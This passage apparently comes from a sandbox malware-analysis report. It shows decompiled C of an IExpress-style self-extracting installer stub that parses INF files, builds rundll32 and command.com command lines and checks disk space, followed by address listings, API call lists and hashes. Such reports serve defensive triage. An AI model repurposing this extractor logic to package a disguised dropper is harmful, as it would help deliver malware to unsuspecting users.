                                                                                                                                                                                                          							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                          								_t140 = 0x525;
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_push(0x10);
                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                          								_t60 =  &_v268;
                                                                                                                                                                                                          								goto L35;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t140 = "[";
                                                                                                                                                                                                          								_v1556 = _t151;
                                                                                                                                                                                                          								_t90 = E00861A84( &_v1556, "[");
                                                                                                                                                                                                          								if(_t90 != 0) {
                                                                                                                                                                                                          									if( *_t90 != 0) {
                                                                                                                                                                                                          										_v1556 = _t90;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t140 = "]";
                                                                                                                                                                                                          									E00861A84( &_v1556, "]");
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                          								if(_t156 == 0) {
                                                                                                                                                                                                          									L43:
                                                                                                                                                                                                          									_t60 = 0;
                                                                                                                                                                                                          									_t140 = 0x4b5;
                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                          									_push(0x10);
                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                          									L35:
                                                                                                                                                                                                          									_push(_t60);
                                                                                                                                                                                                          									E008644B9(0, _t140);
                                                                                                                                                                                                          									_t62 = 0;
                                                                                                                                                                                                          									goto L54;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t155 = _v1556;
                                                                                                                                                                                                          									_t92 = _t155;
                                                                                                                                                                                                          									if( *_t155 == 0) {
                                                                                                                                                                                                          										_t92 = "DefaultInstall";
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									 *0x869120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                          									 *_v1560 = 1;
                                                                                                                                                                                                          									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x861140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                          										 *0x869a34 =  *0x869a34 & 0xfffffffb;
                                                                                                                                                                                                          										if( *0x869a40 != 0) {
                                                                                                                                                                                                          											_t108 = "setupapi.dll";
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t108 = "setupx.dll";
                                                                                                                                                                                                          											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										if( *_t155 == 0) {
                                                                                                                                                                                                          											_t155 = "DefaultInstall";
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_push( &_v268);
                                                                                                                                                                                                          										_push(_t155);
                                                                                                                                                                                                          										E0086171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										 *0x869a34 =  *0x869a34 | 0x00000004;
                                                                                                                                                                                                          										if( *_t155 == 0) {
                                                                                                                                                                                                          											_t155 = "DefaultInstall";
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										E00861680(_t108, 0x104, _t155);
                                                                                                                                                                                                          										_t140 = 0x200;
                                                                                                                                                                                                          										E00861680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									L53:
                                                                                                                                                                                                          									_t62 = 1;
                                                                                                                                                                                                          									 *_v1564 = _t156;
                                                                                                                                                                                                          									L54:
                                                                                                                                                                                                          									_pop(_t152);
                                                                                                                                                                                                          									return E00866CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}














































                                                                                                                                                                                                          0x00861af3
                                                                                                                                                                                                          0x00861afa
                                                                                                                                                                                                          0x00861b07
                                                                                                                                                                                                          0x00861b09
                                                                                                                                                                                                          0x00861b1a
                                                                                                                                                                                                          0x00861b20
                                                                                                                                                                                                          0x00861b2c
                                                                                                                                                                                                          0x00861b3b
                                                                                                                                                                                                          0x00861b40
                                                                                                                                                                                                          0x00861b2e
                                                                                                                                                                                                          0x00861b2e
                                                                                                                                                                                                          0x00861b33
                                                                                                                                                                                                          0x00861b33
                                                                                                                                                                                                          0x00861b46
                                                                                                                                                                                                          0x00861b4c
                                                                                                                                                                                                          0x00861b52
                                                                                                                                                                                                          0x00861b57
                                                                                                                                                                                                          0x00861b5d
                                                                                                                                                                                                          0x00861b61
                                                                                                                                                                                                          0x00861b9f
                                                                                                                                                                                                          0x00861b9f
                                                                                                                                                                                                          0x00861bb1
                                                                                                                                                                                                          0x00861bc2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861b63
                                                                                                                                                                                                          0x00861b63
                                                                                                                                                                                                          0x00861b65
                                                                                                                                                                                                          0x00861b68
                                                                                                                                                                                                          0x00861b68
                                                                                                                                                                                                          0x00861b6a
                                                                                                                                                                                                          0x00861b6b
                                                                                                                                                                                                          0x00861b6f
                                                                                                                                                                                                          0x00861b74
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861b76
                                                                                                                                                                                                          0x00861b7b
                                                                                                                                                                                                          0x00861b86
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861b8c
                                                                                                                                                                                                          0x00861b8c
                                                                                                                                                                                                          0x00861b98
                                                                                                                                                                                                          0x00861bc7
                                                                                                                                                                                                          0x00861bc9
                                                                                                                                                                                                          0x00861bcc
                                                                                                                                                                                                          0x00861bd3
                                                                                                                                                                                                          0x00861d75
                                                                                                                                                                                                          0x00861d76
                                                                                                                                                                                                          0x00861d78
                                                                                                                                                                                                          0x00861d7f
                                                                                                                                                                                                          0x00861e05
                                                                                                                                                                                                          0x00861e09
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861e12
                                                                                                                                                                                                          0x00861e1b
                                                                                                                                                                                                          0x00861e73
                                                                                                                                                                                                          0x00861e21
                                                                                                                                                                                                          0x00861e21
                                                                                                                                                                                                          0x00861e28
                                                                                                                                                                                                          0x00861e37
                                                                                                                                                                                                          0x00861e3e
                                                                                                                                                                                                          0x00861e52
                                                                                                                                                                                                          0x00861e60
                                                                                                                                                                                                          0x00861e60
                                                                                                                                                                                                          0x00861e3e
                                                                                                                                                                                                          0x00861e79
                                                                                                                                                                                                          0x00861e7b
                                                                                                                                                                                                          0x00861e84
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861d9b
                                                                                                                                                                                                          0x00861d9b
                                                                                                                                                                                                          0x00861da0
                                                                                                                                                                                                          0x00861da2
                                                                                                                                                                                                          0x00861da5
                                                                                                                                                                                                          0x00861da5
                                                                                                                                                                                                          0x00861da7
                                                                                                                                                                                                          0x00861da8
                                                                                                                                                                                                          0x00861dac
                                                                                                                                                                                                          0x00861dae
                                                                                                                                                                                                          0x00861db4
                                                                                                                                                                                                          0x00861db7
                                                                                                                                                                                                          0x00861db7
                                                                                                                                                                                                          0x00861db9
                                                                                                                                                                                                          0x00861dba
                                                                                                                                                                                                          0x00861dbe
                                                                                                                                                                                                          0x00861dc3
                                                                                                                                                                                                          0x00861dce
                                                                                                                                                                                                          0x00861dd2
                                                                                                                                                                                                          0x00861deb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861df0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861dd2
                                                                                                                                                                                                          0x00861bf7
                                                                                                                                                                                                          0x00861bfe
                                                                                                                                                                                                          0x00861c07
                                                                                                                                                                                                          0x00861d55
                                                                                                                                                                                                          0x00861d5a
                                                                                                                                                                                                          0x00861d5b
                                                                                                                                                                                                          0x00861d5d
                                                                                                                                                                                                          0x00861d5e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861c1b
                                                                                                                                                                                                          0x00861c1b
                                                                                                                                                                                                          0x00861c20
                                                                                                                                                                                                          0x00861c2c
                                                                                                                                                                                                          0x00861c33
                                                                                                                                                                                                          0x00861c38
                                                                                                                                                                                                          0x00861c3a
                                                                                                                                                                                                          0x00861c3a
                                                                                                                                                                                                          0x00861c40
                                                                                                                                                                                                          0x00861c4b
                                                                                                                                                                                                          0x00861c4b
                                                                                                                                                                                                          0x00861c5d
                                                                                                                                                                                                          0x00861c61
                                                                                                                                                                                                          0x00861dd4
                                                                                                                                                                                                          0x00861dd4
                                                                                                                                                                                                          0x00861dd6
                                                                                                                                                                                                          0x00861ddb
                                                                                                                                                                                                          0x00861ddc
                                                                                                                                                                                                          0x00861dde
                                                                                                                                                                                                          0x00861d64
                                                                                                                                                                                                          0x00861d64
                                                                                                                                                                                                          0x00861d67
                                                                                                                                                                                                          0x00861d6c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861c67
                                                                                                                                                                                                          0x00861c67
                                                                                                                                                                                                          0x00861c6d
                                                                                                                                                                                                          0x00861c72
                                                                                                                                                                                                          0x00861c74
                                                                                                                                                                                                          0x00861c74
                                                                                                                                                                                                          0x00861c8e
                                                                                                                                                                                                          0x00861c99
                                                                                                                                                                                                          0x00861cc0
                                                                                                                                                                                                          0x00861cf8
                                                                                                                                                                                                          0x00861d07
                                                                                                                                                                                                          0x00861d23
                                                                                                                                                                                                          0x00861d09
                                                                                                                                                                                                          0x00861d14
                                                                                                                                                                                                          0x00861d1b
                                                                                                                                                                                                          0x00861d1b
                                                                                                                                                                                                          0x00861d2b
                                                                                                                                                                                                          0x00861d2d
                                                                                                                                                                                                          0x00861d2d
                                                                                                                                                                                                          0x00861d38
                                                                                                                                                                                                          0x00861d39
                                                                                                                                                                                                          0x00861d46
                                                                                                                                                                                                          0x00861cc2
                                                                                                                                                                                                          0x00861cc2
                                                                                                                                                                                                          0x00861ccc
                                                                                                                                                                                                          0x00861cce
                                                                                                                                                                                                          0x00861cce
                                                                                                                                                                                                          0x00861cdb
                                                                                                                                                                                                          0x00861ce6
                                                                                                                                                                                                          0x00861cee
                                                                                                                                                                                                          0x00861cee
                                                                                                                                                                                                          0x00861e89
                                                                                                                                                                                                          0x00861e91
                                                                                                                                                                                                          0x00861e92
                                                                                                                                                                                                          0x00861e94
                                                                                                                                                                                                          0x00861e97
                                                                                                                                                                                                          0x00861ea4
                                                                                                                                                                                                          0x00861ea4
                                                                                                                                                                                                          0x00861c61
                                                                                                                                                                                                          0x00861c07
                                                                                                                                                                                                          0x00861bd3
                                                                                                                                                                                                          0x00861b7b

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00861BE7
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00861BFE
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00861C57
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32 ref: 00861C88
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00861140,00000000,00000008,?), ref: 00861CB8
                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00861D1B
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                          • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                          • API String ID: 383838535-3368923722
                                                                                                                                                                                                          • Opcode ID: 08f15d466a975b18a46d7a186808435af1c8b46612153245fd08a7129df11ef5
                                                                                                                                                                                                          • Instruction ID: aa191c3af610e5376c7b01c57044c7fcb91416b061e3246b9aa507a5ca41ae5c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08f15d466a975b18a46d7a186808435af1c8b46612153245fd08a7129df11ef5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50A13770A002186BEF20DB28CC4DFEA7769FB52310F1E0295E555E72C2DBB59E85CB51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 324 86597d-8659b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 8659dd-865a1b GetDiskFreeSpaceA 324->325 326 8659bb-8659d8 call 8644b9 call 866285 324->326 327 865ba1-865bde memset call 866285 GetLastError FormatMessageA 325->327 328 865a21-865a4a MulDiv 325->328 341 865c05-865c14 call 866ce0 326->341 338 865be3-865bfc call 8644b9 SetCurrentDirectoryA 327->338 328->327 332 865a50-865a6c GetVolumeInformationA 328->332 335 865ab5-865aca SetCurrentDirectoryA 332->335 336 865a6e-865ab0 memset call 866285 GetLastError FormatMessageA 332->336 340 865acc-865ad1 335->340 336->338 352 865c02 338->352 344 865ae2-865ae4 340->344 345 865ad3-865ad8 340->345 349 865ae6 344->349 350 865ae7-865af8 344->350 345->344 347 865ada-865ae0 345->347 347->340 347->344 349->350 351 865af9-865afb 350->351 354 865b05-865b08 351->354 355 865afd-865b03 351->355 356 865c04 352->356 357 865b20-865b27 354->357 358 865b0a-865b1b call 8644b9 354->358 355->351 355->354 356->341 360 865b52-865b5b 357->360 361 865b29-865b33 357->361 358->352 364 865b62-865b6d 360->364 361->360 363 865b35-865b50 361->363 363->364 365 865b76-865b7d 364->365 366 865b6f-865b74 364->366 368 865b83 365->368 369 865b7f-865b81 365->369 367 865b85 366->367 370 865b96-865b9f 367->370 371 865b87-865b94 call 86268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                          			E0086597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                          				char _v788;
                                                                                                                                                                                                          				long _v792;
                                                                                                                                                                                                          				long _v796;
                                                                                                                                                                                                          				long _v800;
                                                                                                                                                                                                          				signed int _v804;
                                                                                                                                                                                                          				long _v808;
                                                                                                                                                                                                          				int _v812;
                                                                                                                                                                                                          				long _v816;
                                                                                                                                                                                                          				long _v820;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                          				int _t69;
                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                          				signed short _t78;
                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                          				signed int _t101;
                                                                                                                                                                                                          				int _t102;
                                                                                                                                                                                                          				unsigned int _t103;
                                                                                                                                                                                                          				unsigned int _t105;
                                                                                                                                                                                                          				signed int _t111;
                                                                                                                                                                                                          				long _t112;
                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                          				CHAR* _t118;
                                                                                                                                                                                                          				signed int _t119;
                                                                                                                                                                                                          				signed int _t120;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t114 = __edi;
                                                                                                                                                                                                          				_t46 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                          				_v804 = __edx;
                                                                                                                                                                                                          				_t118 = __ecx;
                                                                                                                                                                                                          				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                          				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                          				if(_t50 != 0) {
                                                                                                                                                                                                          					_push(__edi);
                                                                                                                                                                                                          					_v796 = 0;
                                                                                                                                                                                                          					_v792 = 0;
                                                                                                                                                                                                          					_v800 = 0;
                                                                                                                                                                                                          					_v808 = 0;
                                                                                                                                                                                                          					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                          					__eflags = _t55;
                                                                                                                                                                                                          					if(_t55 == 0) {
                                                                                                                                                                                                          						L29:
                                                                                                                                                                                                          						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                          						 *0x869124 = E00866285();
                                                                                                                                                                                                          						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                          						_t110 = 0x4b0;
                                                                                                                                                                                                          						L30:
                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                          						E008644B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                          						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                          						L31:
                                                                                                                                                                                                          						_t66 = 0;
                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                          						L32:
                                                                                                                                                                                                          						_pop(_t114);
                                                                                                                                                                                                          						goto L33;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t69 = _v792 * _v796;
                                                                                                                                                                                                          					_v812 = _t69;
                                                                                                                                                                                                          					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                          					__eflags = _t116;
                                                                                                                                                                                                          					if(_t116 == 0) {
                                                                                                                                                                                                          						goto L29;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                          					__eflags = _t73;
                                                                                                                                                                                                          					if(_t73 != 0) {
                                                                                                                                                                                                          						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                          						_t101 =  &_v16;
                                                                                                                                                                                                          						_t111 = 6;
                                                                                                                                                                                                          						_t119 = _t118 - _t101;
                                                                                                                                                                                                          						__eflags = _t119;
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                          							__eflags = _t22;
                                                                                                                                                                                                          							if(_t22 == 0) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                          							__eflags = _t87;
                                                                                                                                                                                                          							if(_t87 == 0) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							 *_t101 = _t87;
                                                                                                                                                                                                          							_t101 = _t101 + 1;
                                                                                                                                                                                                          							_t111 = _t111 - 1;
                                                                                                                                                                                                          							__eflags = _t111;
                                                                                                                                                                                                          							if(_t111 != 0) {
                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t111;
                                                                                                                                                                                                          						if(_t111 == 0) {
                                                                                                                                                                                                          							_t101 = _t101 - 1;
                                                                                                                                                                                                          							__eflags = _t101;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *_t101 = 0;
                                                                                                                                                                                                          						_t112 = 0x200;
                                                                                                                                                                                                          						_t102 = _v812;
                                                                                                                                                                                                          						_t78 = 0;
                                                                                                                                                                                                          						_t118 = 8;
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							__eflags = _t102 - _t112;
                                                                                                                                                                                                          							if(_t102 == _t112) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t112 = _t112 + _t112;
                                                                                                                                                                                                          							_t78 = _t78 + 1;
                                                                                                                                                                                                          							__eflags = _t78 - _t118;
                                                                                                                                                                                                          							if(_t78 < _t118) {
                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t78 - _t118;
                                                                                                                                                                                                          						if(_t78 != _t118) {
                                                                                                                                                                                                          							__eflags =  *0x869a34 & 0x00000008;
                                                                                                                                                                                                          							if(( *0x869a34 & 0x00000008) == 0) {
                                                                                                                                                                                                          								L20:
                                                                                                                                                                                                          								_t103 =  *0x869a38; // 0x0
                                                                                                                                                                                                          								_t110 =  *((intOrPtr*)(0x8689e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                          								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                          								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                          									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                          									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                          										__eflags = _t103 - _t116;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										__eflags = _t110 - _t116;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(__eflags <= 0) {
                                                                                                                                                                                                          									 *0x869124 = 0;
                                                                                                                                                                                                          									_t66 = 1;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t66 = E0086268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                          							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t105 =  *0x869a38; // 0x0
                                                                                                                                                                                                          							_t110 =  *((intOrPtr*)(0x8689e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x8689e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                          							_t103 = (_t105 >> 2) +  *0x869a38;
                                                                                                                                                                                                          							goto L21;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t110 = 0x4c5;
                                                                                                                                                                                                          						E008644B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						goto L31;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                          					_t110 = 0x4f9;
                                                                                                                                                                                                          					goto L30;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t110 = 0x4bc;
                                                                                                                                                                                                          					E008644B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					_t66 = 0;
                                                                                                                                                                                                          					L33:
                                                                                                                                                                                                          					return E00866CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}



































                                                                                                                                                                                                          0x0086597d
                                                                                                                                                                                                          0x00865988
                                                                                                                                                                                                          0x0086598f
                                                                                                                                                                                                          0x0086599a
                                                                                                                                                                                                          0x008659a6
                                                                                                                                                                                                          0x008659a8
                                                                                                                                                                                                          0x008659af
                                                                                                                                                                                                          0x008659b9
                                                                                                                                                                                                          0x008659dd
                                                                                                                                                                                                          0x008659e4
                                                                                                                                                                                                          0x008659f1
                                                                                                                                                                                                          0x008659fe
                                                                                                                                                                                                          0x00865a0b
                                                                                                                                                                                                          0x00865a13
                                                                                                                                                                                                          0x00865a19
                                                                                                                                                                                                          0x00865a1b
                                                                                                                                                                                                          0x00865ba1
                                                                                                                                                                                                          0x00865baf
                                                                                                                                                                                                          0x00865bbd
                                                                                                                                                                                                          0x00865bd8
                                                                                                                                                                                                          0x00865bde
                                                                                                                                                                                                          0x00865be3
                                                                                                                                                                                                          0x00865bec
                                                                                                                                                                                                          0x00865bf0
                                                                                                                                                                                                          0x00865bfc
                                                                                                                                                                                                          0x00865c02
                                                                                                                                                                                                          0x00865c02
                                                                                                                                                                                                          0x00865c02
                                                                                                                                                                                                          0x00865c04
                                                                                                                                                                                                          0x00865c04
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865c04
                                                                                                                                                                                                          0x00865a27
                                                                                                                                                                                                          0x00865a3a
                                                                                                                                                                                                          0x00865a46
                                                                                                                                                                                                          0x00865a48
                                                                                                                                                                                                          0x00865a4a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865a64
                                                                                                                                                                                                          0x00865a6a
                                                                                                                                                                                                          0x00865a6c
                                                                                                                                                                                                          0x00865abc
                                                                                                                                                                                                          0x00865ac2
                                                                                                                                                                                                          0x00865ac9
                                                                                                                                                                                                          0x00865aca
                                                                                                                                                                                                          0x00865aca
                                                                                                                                                                                                          0x00865acc
                                                                                                                                                                                                          0x00865acc
                                                                                                                                                                                                          0x00865acf
                                                                                                                                                                                                          0x00865ad1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865ad3
                                                                                                                                                                                                          0x00865ad6
                                                                                                                                                                                                          0x00865ad8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865ada
                                                                                                                                                                                                          0x00865adc
                                                                                                                                                                                                          0x00865add
                                                                                                                                                                                                          0x00865add
                                                                                                                                                                                                          0x00865ae0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865ae0
                                                                                                                                                                                                          0x00865ae2
                                                                                                                                                                                                          0x00865ae4
                                                                                                                                                                                                          0x00865ae6
                                                                                                                                                                                                          0x00865ae6
                                                                                                                                                                                                          0x00865ae6
                                                                                                                                                                                                          0x00865ae9
                                                                                                                                                                                                          0x00865aeb
                                                                                                                                                                                                          0x00865af0
                                                                                                                                                                                                          0x00865af6
                                                                                                                                                                                                          0x00865af8
                                                                                                                                                                                                          0x00865af9
                                                                                                                                                                                                          0x00865af9
                                                                                                                                                                                                          0x00865afb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865afd
                                                                                                                                                                                                          0x00865aff
                                                                                                                                                                                                          0x00865b00
                                                                                                                                                                                                          0x00865b03
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865b03
                                                                                                                                                                                                          0x00865b05
                                                                                                                                                                                                          0x00865b08
                                                                                                                                                                                                          0x00865b20
                                                                                                                                                                                                          0x00865b27
                                                                                                                                                                                                          0x00865b52
                                                                                                                                                                                                          0x00865b52
                                                                                                                                                                                                          0x00865b5b
                                                                                                                                                                                                          0x00865b62
                                                                                                                                                                                                          0x00865b6b
                                                                                                                                                                                                          0x00865b6d
                                                                                                                                                                                                          0x00865b76
                                                                                                                                                                                                          0x00865b7d
                                                                                                                                                                                                          0x00865b83
                                                                                                                                                                                                          0x00865b7f
                                                                                                                                                                                                          0x00865b7f
                                                                                                                                                                                                          0x00865b7f
                                                                                                                                                                                                          0x00865b6f
                                                                                                                                                                                                          0x00865b72
                                                                                                                                                                                                          0x00865b72
                                                                                                                                                                                                          0x00865b85
                                                                                                                                                                                                          0x00865b98
                                                                                                                                                                                                          0x00865b9e
                                                                                                                                                                                                          0x00865b87
                                                                                                                                                                                                          0x00865b8f
                                                                                                                                                                                                          0x00865b8f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865b85
                                                                                                                                                                                                          0x00865b29
                                                                                                                                                                                                          0x00865b33
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865b35
                                                                                                                                                                                                          0x00865b48
                                                                                                                                                                                                          0x00865b4a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865b4a
                                                                                                                                                                                                          0x00865b0f
